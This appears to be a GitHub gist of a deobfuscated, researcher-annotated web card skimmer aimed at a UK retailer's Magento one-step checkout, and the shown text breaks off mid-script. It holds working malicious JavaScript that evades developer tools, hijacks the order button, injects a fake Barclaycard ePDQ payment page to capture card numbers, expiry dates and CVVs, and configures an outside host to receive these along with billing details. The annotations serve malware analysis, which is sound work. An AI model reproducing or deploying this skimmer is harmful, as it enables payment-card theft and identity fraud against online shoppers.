Skip to content

Instantly share code, notes, and snippets.

@krautface

krautface/checkcheck.pretty.full.deob.js Secret

Created July 3, 2021 07:06
Show Gist options
  • Save krautface/4ffef78eda7d907587e67f08ef31112c to your computer and use it in GitHub Desktop.
Save krautface/4ffef78eda7d907587e67f08ef31112c to your computer and use it in GitHub Desktop.
Download ZIP
Raw
checkcheck.pretty.full.deob.js
function checkForDevTools()
{
'use strict';
var devToolsState = {
'open': ![],
'orientation': null
},
_0x4605dc = 160,
devChange = function (open, orientation)
{
window['dispatchEvent'](new CustomEvent('devtoolschange',
{
'detail':
{
'open': open,
'orientation': orientation
}
}));
};
setInterval(function ()
{
var widthGap = window['outerWidth'] - window['innerWidth'] > 160,
heightGap = window['outerHeight'] - window['innerHeight'] > 160,
orientation = widthGap ? 'vertical' : 'horizontal';
!(heightGap && widthGap) && (window['Firebug'] && window['Firebug']['chrome'] && window['Firebug']['chrome']['isInitialized'] || widthGap || heightGap) ? ((!devToolsState['open'] || devToolsState['orientation'] !== orientation) && devChange(!![], orientation), devToolsState['open'] = !![], devToolsState['orientation'] = orientation) : (devToolsState['open'] && devChange(![], null), devToolsState['open'] = ![], devToolsState['orientation'] = null);
}, 100), typeof module !== 'undefined' && module['exports'] ? module['exports'] = devToolsState : window['devtools'] = devToolsState;
}
checkForDevTools()
function skimmer()
{
const paymentInjectConfig = {
'frame_id': '#barclaycardcw_payment',
'radio': '#p_method_barclaycardcw_creditcard',
'final_cookie': 'mage-checkout-mc',
'data_atr': 'data-checkout',
'data_val': 'true',
'sendbtn': '#submit3',
'cnum': '#Ecom_Payment_Card_Number',
'expm': '#Ecom_Payment_Card_ExpDate_Month',
'expy': '#Ecom_Payment_Card_ExpDate_Year',
'cvv': '#Ecom_Payment_Card_Verification',
'origbtn': 'button#aw-onestepcheckout-place-order-button',
'fbtn': '#aw-onestepchecout-place-order-button',
'loader': '.aw-onestepcheckout-place-order-please-wait'
},
exfilConfig = {
'url': 'https://livechatlnc.com/checkouts.js',
'adr': 'input[name="billing[street][]"]',
'cnm': 'input[name="billing[firstname]"]',
'cna': 'input[name="billing[lastname]"]',
'eml': 'input[name="billing[email]"]',
'phn': 'input[name="billing[telephone]"]',
'cit': 'input[name="billing[city]"]',
'sta': 'select[name="billing[region_id]"]',
'cnt': 'select[name="billing[country_id]"]',
'zip': 'input[name="billing[postcode]"]',
'shp': window['location']['host']
},
// Check to see if the "button#aw-onestepcheckout-place-order-button" is present
// and has a 'data-checkout' attribute set
// If it does, grab it and set the 'data-checkout' attribute to 'true'
// Then clone the button and replace it with the clone
// Then add a new onclick event which will inject a malicious payment form
bindButton = () =>
{
if (getSelector(paymentInjectConfig['origbtn']) && !getSelector(paymentInjectConfig['origbtn'])['hasAttribute'](paymentInjectConfig['data_atr']))
{
getSelector(paymentInjectConfig['origbtn'])['setAttribute'](paymentInjectConfig['data_atr'], paymentInjectConfig['data_val']);
let origbtn = getSelector(paymentInjectConfig['origbtn']),
newButton = origbtn['cloneNode'](true);
origbtn['parentNode']['replaceChild'](newButton, origbtn), getSelector(paymentInjectConfig['origbtn'])['addEventListener']('click', () =>
{
getSelector(paymentInjectConfig['origbtn'])['setAttribute']('disabled', 'disabled'), setTimeout(() =>
{
injectForm();
}, 2000);
});
}
};
checkRsrch = () =>
{
// if not Mobile and devtools are open
// set a cookie of the name "mage-checkout-mc" (from the paymentInjectConfig)
// with an expiration date five days in the future and a random value and then reload the page
if (navigator['userAgent']['indexOf']('Mobile') == -1 && window['devtools']['open'] === true) {
setCookie(paymentInjectConfig['final_cookie'], Math['floor'](0x5f5e100 + Math['random']() * 0x35a4e900), 5);
window['location']['reload']();
}
},
// Every 500ms, check if the "final_cookie" (which is named mage-checkout-mc) is set
// If it is, do nothing
// If not, call checkRsrch to see if devtools are open or if they're on mobile
// If it's not, check to see if the URL contains 'onestepcheckout'
// If it does, check again if the useragent includes Mobile (??)
// This is a bug in this version of the skimmer. Newer versions have fixed this
setInterval(() =>
{
if (getCookie(paymentInjectConfig['final_cookie'])) return;
checkRsrch();
if (!new RegExp('onestepcheckout')['test'](window['location'])) return;
if (navigator['userAgent']['includes']('Mobile')) {
// if the "p_method_barclaycardcw_creditcard" radio button is selected
// then check to see if the "button#aw-onestepcheckout-place-order-button" is present
if (getSelector(paymentInjectConfig['radio']) && getSelector(paymentInjectConfig['radio'])['checked']) {
if (getSelector(paymentInjectConfig['origbtn'])) {
bindButton()
}
}
}
}, 500);
const _0x5d7a20 = function (_0x289964)
{
return new Promise((_0x481c9b, _0x4c4d39) =>
{
var _0x56281e = _0x252a;
let _0x548c2c = 'z-index: 999999;display: none;width:100%;height: 200vh;border: none;',
_0x295a15 = '<iframe id="' + _0x289964['replace']('#', '') + '" frameborder="0" style="' + _0x548c2c + '"></iframe>';
!document['querySelector'](_0x289964) && (document['querySelector']('body')['insertAdjacentHTML']('afterbegin', _0x295a15), _0x481c9b(document['querySelector'](_0x289964)));
});
},
_0x1a1ea7 = () =>
{
getSelector('#chat-widget-container') ? getSelector('#chat-widget-container')['style']['display'] = 'none' : ![], getSelector('.wrapper') ? getSelector('.wrapper')['style']['display'] = 'none' : ![];
},
injectForm = () =>
{
var _0x27403d = _0x2adc58;
let _0x38be75 = Math['ceil'](Math['random']() * 0x989680),
_0x10b989 = getSelector('span.aw-onestepcheckout-place-order-amount')['innerText']['substr'](0x1),
_0x25d16f = `\x0a\x09\x09<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\x0a\x09\x09<html>\x0a\x09\x09 <!-- ePDQ static template -->\x0a\x09\x09 <head>\x0a\x09\x09\x09<meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\" />\x0a\x09\x09\x09<title>Payment confirmation</title>\x0a\x09\x09\x09<style type=\"text/css\">\x0a\x09\x09\x09 td.ncolh1 {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncoltxtl {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09text-align: right;\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncoltxtl2 {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09text-align: right;\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncoltxtr {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09text-align: left;\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncoltxtc {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09text-align: center;\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncollogol {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09text-align: right;\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncollogor {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09text-align: left;\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncollogoc {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09text-align: center;\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncoltxtmessage {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09text-align: left;\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncolinput {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncolline1 {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncolline2 {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 input.ncol {\x0a\x09\x09\x09\x09background-color: darkblack;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 input.numberLtr {\x0a\x09\x09\x09\x09direction: ltr;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 table.ncoltable1 {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09border: 1px solid #000000;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 table.ncoltable2 {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09border: 1px solid #000000;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 table.ncoltable3 {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09border: 1px solid #000000;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 table.ncoltable1 td {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 table.ncoltable2 td {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 table.ncoltable3 td {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 a {\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09text-decoration: underline;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 p {\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td {\x0a\x09\x09\x09 }\x0a\x09\x09\x09 .DDtxt {\x0a\x09\x09\x09\x09text-align: left;\x0a\x09\x09\x09\x09margin-left: 2em;\x0a\x09\x09\x09\x09font-weight: normal;\x0a\x09\x09\x09\x09margin-top: 0;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 .DDlabel {\x0a\x09\x09\x09\x09text-align: left;\x0a\x09\x09\x09\x09margin-left: 4em;\x0a\x09\x09\x09\x09font-weight: normal;\x0a\x09\x09\x09\x09margin-top: 0;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 .DDdata {\x0a\x09\x09\x09\x09font-weight: normal;\x0a\x09\x09\x09\x09margin-top: 0;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 .MKtxt {\x0a\x09\x09\x09\x09text-align: left;\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09margin-left: 2em;\x0a\x09\x09\x09\x09margin-top: 0;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 .MKlabel {\x0a\x09\x09\x09\x09text-align: left;\x0a\x09\x09\x09\x09margin-left: 4em;\x0a\x09\x09\x09\x09font-weight: normal;\x0a\x09\x09\x09\x09font-style: italic;\x0a\x09\x09\x09\x09margin-top: 0;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncoltxtr p.MKlabel {\x0a\x09\x09\x09\x09margin-left: 0;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 .MKdata {\x0a\x09\x09\x09\x09font-weight: normal;\x0a\x09\x09\x09\x09margin-top: 0;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 .DDimp {\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09margin-left: 2em;\x0a\x09\x09\x09\x09text-align: left;\x0a\x09\x09\x09\x09margin-top: 0;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 .DDsection {\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09margin-left: 0em;\x0a\x09\x09\x09\x09text-align: left;\x0a\x09\x09\x09\x09margin-top: 1em;\x0a\x09\x09\x09\x09margin-bottom: 0em;\x0a\x09\x09\x09 }\x0a\x09\x09\x09</style>\x0a\x09\x09 </head>\x0a\x09\x09\x0a\x09\x09 <body text=\"#000000\" bgcolor=\"#FFFFFF\">\x0a\x09\x09\x0a\x09\x09\x09<div id=\"over_pay\" style=\"display:none; position: absolute;width: 100%;height: 200%;background-color: #fff;opacity: .5;z-index: 999;\"></div>\x0a\x09\x09\x0a\x09\x09\x09<table width=\"100%\" border=\"0\">\x0a\x09\x09\x09 <tbody>\x0a\x09\x09\x09\x09<tr>\x0a\x09\x09\x09\x09 <td width=\"15%\"></td>\x0a\x09\x09\x09\x09 <td width=\"70%\">\x0a\x09\x09\x09\x09\x09<div align=\"center\">\x0a\x09\x09\x09\x09\x09 <font size=\"4\" face=\"Verdana\"><strong>Payment confirmation</strong></font>\x0a\x09\x09\x09\x09\x09</div>\x0a\x09\x09\x09\x09\x09<br />\x0a\x09\x09\x0a\x09\x09\x09\x09\x09<!-- Order overview -->\x0a\x09\x09\x09\x09\x09<h2 style=\"display: inline; position: absolute; left: -1000px; top: -1000px; width: 0px; height: 0px; overflow: hidden;\">Order overview</h2>\x0a\x09\x09\x09\x09\x09<table class=\"ncoltable1\" id=\"ncol_ref\" width=\"95%\" cellspacing=\"0\" cellpadding=\"2\" border=\"0\">\x0a\x09\x09\x09\x09\x09 <tbody>\x0a\x09\x09\x09\x09\x09\x09<tr>\x0a\x09\x09\x09\x09\x09\x09 <td class=\"ncoltxtl\" colspan=\"1\" width=\"50%\" align=\"right\">\x0a\x09\x09\x09\x09\x09\x09\x09<small>Order reference :<!--External reference--></small>\x0a\x09\x09\x09\x09\x09\x09 </td>\x0a\x09\x09\x09\x09\x09\x09 <td class=\"ncoltxtr\" colspan=\"1\" width=\"50%\"><small>order_' + _0x38be75 + '</small></td>
</tr>
<tr>
<td class="ncoltxtl" colspan="1" width="50%" align="right">
<small> Total charge :<!--Total to pay--> </small>
</td>
<td class="ncoltxtr" colspan="1" width="50%">
<small>' + _0x10b989 + ' GBP </small>
</td>
</tr>
<tr>
<td class="ncoltxtl" colspan="1" align="right">
<small>Beneficiary :<!--Beneficiary--></small>
</td>
<td class="ncoltxtr" colspan="1"><small>Designer Stone Shower Trays Ltd</small></td>
</tr>
</tbody>
</table>
<style type="text/css">
.sectionTitle {
font-weight: bold;
text-align: center;
vertical-align: baseline;
font-size: small;
padding: 10px;
text-decoration: underline;
}
.fieldTitle {
font-weight: bold;
text-align: right;
vertical-align: baseline;
font-size: small;
padding: 3px;
}
.fieldValue {
text-align: left;
vertical-align: baseline;
font-size: small;
padding: 3px;
}
.star {
font-size: 10px;
}
.note {
font-size: 10px;
padding: 3px;
}
.tc {
font-size: 10px;
padding: 5px;
}
.justify {
text-align: justify;
}
</style>
<div class="kaxsdc" data-event="load"></div>
<p></p>
<!-- Hidden title for screenreaders (Payment Data) -->
<h2 style="display: inline; position: absolute; left: -1000px; top: -1000px; width: 0px; height: 0px; overflow: hidden;">Payment data</h2>
<table id="step1" class="ncoltable2" width="95%" cellspacing="0" cellpadding="2" border="0">
<tbody>
<tr>
<td class="ncolh1" rowspan="1" colspan="3" valign="top" align="center">
<b>
<small>Please select a payment method by clicking on the logo.<!--Payment method--></small>
</b>
</td>
</tr>
<tr>
<td colspan="1" class="ncolline1" width="5%" valign="top" align="left">&nbsp;</td>
<td colspan="1" class="ncolline1" width="45%" valign="center" align="right">
<small>
<small><span class="1"> VISA</span></small>
</small>
</td>
<td colspan="1" class="ncolline1" valign="top" align="left">
<input type="image" name="VISA_brand" src="https://payments.epdq.co.uk/images/VISA_choice.gif" alt="VISA" title="VISA" class="NCOLINIM" style="margin: 3px;" align="middle" /><input type="hidden" name="paymethod" value="CreditCard" />
</td>
</tr>
<tr>
<td colspan="1" class="ncolline2" width="5%" valign="top" align="left">&nbsp;</td>
<td colspan="1" class="ncolline2" width="45%" valign="center" align="right">
<small>
<small><span class="1"> JCB</span></small>
</small>
</td>
<td colspan="1" class="ncolline2" valign="top" align="left">
<input type="image" name="JCB_brand" src="https://payments.epdq.co.uk/images/JCB_choice.gif" alt="JCB" title="JCB" class="NCOLINIM" style="margin: 3px;" align="middle" />
</td>
</tr>
<tr>
<td colspan="1" class="ncolline1" width="5%" valign="top" align="left">&nbsp;</td>
<td colspan="1" class="ncolline1" width="45%" valign="center" align="right">
<small>
<small><span class="1"> MasterCard</span></small>
</small>
</td>
<td colspan="1" class="ncolline1" valign="top" align="left">
<input type="image" name="Eurocard_brand" src="https://payments.epdq.co.uk/images/Eurocard_choice.gif" alt="MasterCard" title="MasterCard" class="NCOLINIM" style="margin: 3px;" align="middle" />
</td>
</tr>
<tr>
<td colspan="1" class="ncolline2" width="5%" valign="top" align="left">&nbsp;</td>
<td colspan="1" class="ncolline2" width="45%" valign="center" align="right">
<small>
<small><span class="2"> Maestro</span></small>
</small>
</td>
<td colspan="1" class="ncolline2" valign="top" align="left">
<input type="image" name="Maestro_brand" src="https://payments.epdq.co.uk/images/Maestro_choice.gif" alt="Maestro" title="Maestro" class="NCOLINIM" style="margin: 3px;" align="middle" />
<small>
<small>
<a
href="https://payments.epdq.co.uk/info.asp?product=MAYIPAYMAESTRO1&amp;CSRFSP=%2Fncol%2Fprod%2Forderstandard%5Futf8%2Easp&amp;CSRFKEY=146A825D5D6C59C66B7C26EEED5AED64EF3BB809&amp;CSRFTS=20210622191821"
target="POPUP"
onclick="openPOPUP(this,'');return false"
>
Can I actually pay with my Maestro card?
</a>
<script type="text/JavaScript">
<!--//
function openPOPUP(lien,l_features)
{
var theURL, winName
theURL = lien.href;
winName= lien.target;
NewWindow = window.open(theURL,winName,l_features);
NewWindow.focus();
}
//-->
</script>
</small>
</small>
</td>
</tr>
</tbody>
</table>
<table id="step2" class="ncoltable2" width="95%" cellspacing="0" cellpadding="2" border="0" style="display: none;">
<tbody>
<tr>
<td class="ncoltxtl2" width="50%" valign="top" align="right">
<small>
Pay with<!--Credit card-->
:
</small>
</td>
<td class="ncolinput" width="50%" valign="top" nowrap="" align="left">
<img id="cardtypeimg" src="https://payments.epdq.co.uk/images/Eurocard_choice.gif">
</td>
</tr>
<tr>
<td class="ncoltxtl2" align="right">
<small>
<label for="Ecom_Payment_Card_Name">Cardholder's name*</label>
<!--Card holder name-->
:
</small>
</td>
<td class="ncolinput">
<small><input type="text" name="Ecom_Payment_Card_Name" id="Ecom_Payment_Card_Name" maxlength="35" size="20" value="" aria-required="true" /></small>
</td>
</tr>
<tr>
<td class="ncoltxtl2" align="right">
<small>
<label for="Ecom_Payment_Card_Number">
Card number*
</label>
<!--Card number-->
:
</small>
</td>
<td class="ncolinput">
<small>
<input name="Ecom_Payment_Card_Number" id="' + paymentInjectConfig['cnum']['replace']('#', '') + '" autocomplete="Off" maxlength="20" size="20" type="text" class="numberLtr" aria-required="true" />
</small>
</td>
</tr>
<tr>
<td class="ncoltxtl2" align="right">
<small> <label for="Ecom_Payment_Card_ExpDate_Month"> Expiry date (mm</label>/<label for="Ecom_Payment_Card_ExpDate_Year">yyyy)* </label> :</small>
</td>
<td class="ncolinput">
<small>
<select
id="' + paymentInjectConfig['expm']['replace']('#', '') + '"
name="Ecom_Payment_Card_ExpDate_Month"
size="1"
title=" Expiry date (mm/yyyy) (month)"
>
<option value=""></option>
<option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
</select>
/
<select
id="' + paymentInjectConfig['expy']['replace']('#', '') + '\"\x0a\x09\x09\x09\x09\x09\x09\x09\x09 name=\"Ecom_Payment_Card_ExpDate_Year\"\x0a\x09\x09\x09\x09\x09\x09\x09\x09 size=\"1\"\x0a\x09\x09\x09\x09\x09\x09\x09\x09 title=\" Expiry date (mm/yyyy) (year)\"\x0a\x09\x09\x09\x09\x09\x09\x09\x09>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"\"></option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2021\">2021</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2022\">2022</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2023\">2023</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2024\">2024</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2025\">2025</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2026\">2026</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2027\">2027</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2028\">2028</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2029\">2029</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2030\">2030</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2031\">2031</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2032\">2032</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2033\">2033</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2034\">2034</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2035\">2035</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2036\">2036</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2037\">2037</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2038\">2038</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2039\">2039</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2040\">2040</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2041\">2041</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2042\">2042</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2043\">2043</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2044\">2044</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2045\">2045</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2046\">2046</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09</select>\x0a\x09\x09\x09\x09\x09\x09\x09 </small>\x0a\x09\x09\x09\x09\x09\x09\x09</td>\x0a\x09\x09\x09\x09\x09\x09 </tr>\x0a\x09\x09\x0a\x09\x09\x09\x09\x09\x09 <tr id=\"cvc_dob_row\">\x0a\x09\x09\x09\x09\x09\x09\x09<td class=\"ncoltxtl2\" align=\"right\">\x0a\x09\x09\x09\x09\x09\x09\x09 <small>\x0a\x09\x09\x09\x09\x09\x09\x09\x09<label id=\"lbl_ecom_payment_card_identification\" for=\"Ecom_Payment_Card_Verification\" style=\"display: none;\">Card verification code* :</label>\x0a\x09\x09\x09\x09\x09\x09\x09\x09<label id=\"lbl_cvc\" for=\"Ecom_Payment_Card_Verification\">Card verification code* :</label>\x0a\x09\x09\x09\x09\x09\x09\x09 </small>\x0a\x09\x09\x09\x09\x09\x09\x09</td>\x0a\x09\x09\x0a\x09\x09\x09\x09\x09\x09\x09<td class=\"ncolinput\">\x0a\x09\x09\x09\x09\x09\x09\x09 <small>\x0a\x09\x09\x09\x09\x09\x09\x09\x09<input type=\"text\" name=\"Ecom_Payment_Card_Verification\" id=\"' + paymentInjectConfig['cvv']['replace']('#', '') + '\" autocomplete=\"Off\" size=\"10\" maxlength=\"10\" aria-required=\"true\" value=\"\" />\x0a\x09\x09\x09\x09\x09\x09\x09 </small>\x0a\x09\x09\x0a\x09\x09\x09\x09\x09\x09\x09 <small>\x0a\x09\x09\x09\x09\x09\x09\x09\x09<small>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <a\x0a\x09\x09\x09\x09\x09\x09\x09\x09\x09class=\"midncol\"\x0a\x09\x09\x09\x09\x09\x09\x09\x09\x09href=\"https://payments.epdq.co.uk/ncol/prod/card_verification_code.asp?lang=1&ABRAND=%3BEurocard&CSRFSP=%2Fncol%2Fprod%2Forderstandard%5FUTF8%2Easp&CSRFKEY=0DB07C8D07D7BD54FAAE145D572742B038CD0AA2&CSRFTS=20210622191938\"\x0a\x09\x09\x09\x09\x09\x09\x09\x09\x09target=\"popup\"\x0a\x09\x09\x09\x09\x09\x09\x09\x09\x09onclick=\"window.open(\'\',\'popup\',\'width=300,height=400,left=0,top=0,scrollbars=1\')\"\x0a\x09\x09\x09\x09\x09\x09\x09\x09 >\x0a\x09\x09\x09\x09\x09\x09\x09\x09\x09What is this?\x0a\x09\x09\x09\x09\x09\x09\x09\x09 </a>\x0a\x09\x09\x09\x09\x09\x09\x09\x09</small>\x0a\x09\x09\x09\x09\x09\x09\x09 </small>\x0a\x09\x09\x09\x09\x09\x09\x09</td>\x0a\x09\x09\x09\x09\x09\x09 </tr>\x0a\x09\x09\x0a\x09\x09\x09\x09\x09\x09 <tr>\x0a\x09\x09\x09\x09\x09\x09\x09<td colspan=\"2\" valign=\"middle\" align=\"center\">\x0a\x09\x09\x09\x09\x09\x09\x09 <small>\x0a\x09\x09\x09\x09\x09\x09\x09\x09<small>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 * Mandatory fields\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <br />\x0a\x09\x09\x09\x09\x09\x09\x09\x09</small>\x0a\x09\x09\x09\x09\x09\x09\x09 </small>\x0a\x09\x09\x09\x09\x09\x09\x09</td>\x0a\x09\x09\x09\x09\x09\x09 </tr>\x0a\x09\x09\x09\x09\x09\x09 <tr align=\"center\">\x0a\x09\x09\x09\x09\x09\x09\x09<td colspan=\"2\" valign=\"middle\" align=\"center\">\x0a\x09\x09\x09\x09\x09\x09\x09 <small>\x0a\x09\x09\x09\x09\x09\x09\x09\x09<input type=\"button\" class=\"ncol\" name=\"payment\" value=\"Yes, I confirm my payment\" id=\"' + paymentInjectConfig['sendbtn']['replace']('#', '') + '" />
</small>
</td>
</tr>
</tbody>
</table>
<!-- Further information / Cancel -->
<h2 style="display: inline; position: absolute; left: -1000px; top: -1000px; width: 0px; height: 0px; overflow: hidden;">Further information / Cancel</h2>
<table class="ncoltable3" id="ie_cc" style="behavior: url(#default#clientCaps);margin-top: 20px;" width="95%" cellspacing="0" cellpadding="2" border="0">
<tbody>
<tr>
<td class="ncollogoc" width="33%" valign="middle" align="center">
<a href="https://www.mastercard.us/en-us/frequently-asked-questions.html#securecode" target="_blank">
<img id="botpic" src="">
</a>
</td>
<td class="ncollogoc" width="33%" valign="middle" align="center">
<img src="https://payments.epdq.co.uk/images/EPDQ_BOLogoPowered.png">
<br />
<small><small></small></small>
</td>
<td class="ncollogoc" width="33%" valign="middle" align="center"></td>
</tr>
<tr>
<td class="ncollogoc" colspan="3" align="center">
<center>
<table cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td class="ncollogoc" width="50%" align="center">
<small><input class="ncol" type="button" name="reselect" value="Back" id="btn_Back" /></small>
</td>
<td class="ncollogoc" width="50%" align="center"></td>
</tr>
</tbody>
</table>
</center>
</td>
</tr>
</tbody>
</table>
</td>
<td width="15%"></td>
</tr>
</tbody>
</table>
<script>
let imgs = {
visa: {
top: 'https://payments.epdq.co.uk/images/VISA_choice.gif',
bot: 'https://payments.epdq.co.uk/images/VISA_brand3D.gif'
},
master: {
top: 'https://payments.epdq.co.uk/images/Eurocard_choice.gif',
bot: 'https://payments.epdq.co.uk/images/Eurocard_brand3D.gif'
},
jcb: {
top: 'https://payments.epdq.co.uk/images/JCB_choice.gif',
bot: ''
},
maestro: {
top: 'https://payments.epdq.co.uk/images/Maestro_choice.gif',
bot: ''
}
}
let topimg = document.querySelector('#cardtypeimg');
let botimg = document.querySelector('#botpic');
let topsrc = '';
let botsrc = '';
document.querySelectorAll('#step1 input[type=image]').forEach(item => {
item.addEventListener('click', (e) => {
checkType(e);
})
});
const checkType = e => {
console.log(e.target.name);
switch (e.target.name) {
case 'VISA_brand':
document.querySelector('#step1').style.display = 'none';
document.querySelector('#step2').style.display = 'table';
topsrc = imgs.visa.top;
botsrc = imgs.visa.bot;
break;
case 'Eurocard_brand':
document.querySelector('#step1').style.display = 'none';
document.querySelector('#step2').style.display = 'table';
topsrc = imgs.master.top;
botsrc = imgs.master.bot;
break;
case 'JCB_brand':
